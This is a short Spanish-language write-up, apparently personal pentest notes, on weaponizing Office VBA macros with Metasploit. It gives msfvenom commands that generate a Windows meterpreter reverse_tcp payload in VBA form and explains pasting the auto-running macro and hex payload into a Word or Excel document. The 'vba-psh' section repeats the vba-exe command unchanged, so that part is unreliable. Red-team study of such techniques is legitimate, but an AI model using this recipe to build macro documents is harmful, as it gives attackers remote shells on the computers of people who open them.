~/write-ups/writeup-3977d93542
Weaponizing VBA Macros with MSF
Imported from Notion: Weaponizing VBA Macros with MSF
Payload con msfvenom
En una máquina Kali, generamos el payload con msfvenom:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=TU_IP LPORT=4444 -f vba-exe
Cambia
TU_IPpor tu IP.

Como indica el output, este payload se divide en dos partes:
-
La macro: hay que copiarla en el editor de macros del documento de Office. Esta macro se ejecutará al abrir el documento.
-
Los datos: el volcado hexadecimal que aparece al final de la salida debe añadirse al final del contenido del documento.
warning
Workbook_Open()abre Excel.Document_Open()abre Word.EDITA EL CÓDIGO PARA USAR WORD.
EL PAYLOAD SE PEGA DIRECTAMENTE EN EL DOCUMENTO.
Otro método: vba-psh
También podemos generar el payload usando vba-psh.
En una máquina Kali, obtenemos el payload con msfvenom:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=TU_IP LPORT=4444 -f vba-exe
Cambia
TU_IPpor tu IP.

warning
Workbook_Open()abre Excel.Document_Open()abre Word.EDITA EL CÓDIGO PARA USAR WORD.
EL PAYLOAD SE PEGA DIRECTAMENTE EN EL DOCUMENTO.
- EOF -
<< back_to_index